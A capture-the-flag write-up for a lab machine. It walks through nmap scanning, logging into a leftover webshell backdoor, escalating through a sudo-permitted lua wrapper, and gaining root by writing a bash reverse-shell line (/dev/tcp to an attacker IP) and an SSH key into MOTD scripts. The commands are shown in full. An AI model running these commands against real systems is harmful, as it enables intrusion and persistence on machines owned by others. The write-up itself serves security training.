Jump Ahead: Enum – Initial Access – User – Root – Resources
To solve this machine, we begin by enumerating open services – finding ports
80. Going to the website, we are told there is a backdoor installed on the webserver. Looking at the sourcecode, we find a comment, which leads us to a github repo of webshells. Trying the filenames on the webserver, we find the backdoor and log in using the credentials in its source code. After getting a shell on the machine, we run
sudo -l, which shows us a command we are able to run as
sysadmin. Using this tool, we are able to get a shell – giving us
user.txt. While monitoring processes, we see a script that copies “Message of the Day” files. Due to the permissions of the copied files, we are able to get a reverse shell as root – grabbing
Like all machines, we begin by enumerting open services using nmap – doing so, we see that only port
80 are open.
$ nmap -v -p- -T4 10.10.10.181 & $ nmap -A -oA scans/nmap-tcp-scripts -p 22,80 10.10.10.181 [...] # Nmap 7.80 scan initiated Fri Apr 10 14:37:47 2020 as: nmap -A -oA scans/nmap-tcp-scripts -p 22,80 10.10.10.181 Nmap scan report for 10.10.10.181 Host is up (0.053s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA) | 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA) |_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Help us Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Apr 10 14:37:56 2020 -- 1 IP address (1 host up) scanned in 9.00 seconds
Using gobuster to enumerate the webserver for files and directories, we do not find anything of interest.
Going to the webserver, we are told that the website has been hacked, and that a backdoor was left open. Looking at the source code of the webpage, we see a comment that might give us a hint to the backdoor location. Googling the comment, we find a github repo that contains many webserver backdoor scripts. Trying these file names, we eventually find the backdoor at
With the credentials that are in the source code on GitHub, we are able to log into the backdoor. Using the backdoor console to poke around the machine, we find
/home/webadmin/note.txt that tells us of a tool to practice lua.
At this point, we (optionally) generate a native reverse shell to upload to the machine for better interaction with the server.
Having gained access to the machine, we begin enumeration tasks. After running
sudo -l, we see that we are able to run a command as the
sysadmin user. Additionally, looking at our
.bash_history file shows the use of this command.
Based on the syntax in which the command is invoked, we can assume this was the tool
note.txt spoke of, and that it appears to be a wrapper for the lua interpreter. Running the command confirms it.
Checking GTFOBins, we find there is a way to get a shell. Doing so, we get a shell as
sysadmin, and can read
$ sudo -u sysadmin /home/sysadmin/luvit -e 'os.execute("/bin/bash")'
Since we’ve gained access to the server as
sysadmin, we begin enumerating the machine by running LinPEAS, however, we do not find anything of interest. A good task to try next is to monitor processes, and to do this, we can use pspy. Doing so, we see there is a process running as
root that updates/resets the Message of the Day (MOTD) after a 30-second delay.
Changing to the
/etc/update-motd.d/ directory, we see that we have write permission as
sysadmin to the files copied.
To exploit this, we drop our shell as
sysadmin, then upload our SSH public key to
/home/webadmin/.ssh/authorized_keys. The hope is that when we SSH into the machine as
webadmin, we might get a shell as root (MOTD is read/executed on login).
$ echo 'public key' >> /home/webadmin/.ssh/authorized_keys
Escalating back to
sysadmin, we compare
/etc/update-motd.d/00-header to the result of the MOTD when we SSH into the machine, which proves this is the file we should edit.
Lastly, we start a ncat listener on our machine, update the MOTD right after the copy/reset is performed, and SSH into the machine as
webadmim to get a reverse shell as
root. Finally, we can now view
$ nc -lvnp 4433 $ echo "bash -c 'bash -i >& /dev/tcp/10.10.14.1/4433 0>&1'" >> /etc/update-motd.d/00-header $ ssh -l webadmin 10.10.10.181
Thank you for taking the time to read my write-up. I am interested in other ways this machine has been solved. Feel free to reach out to me and we can discuss it. Thanks!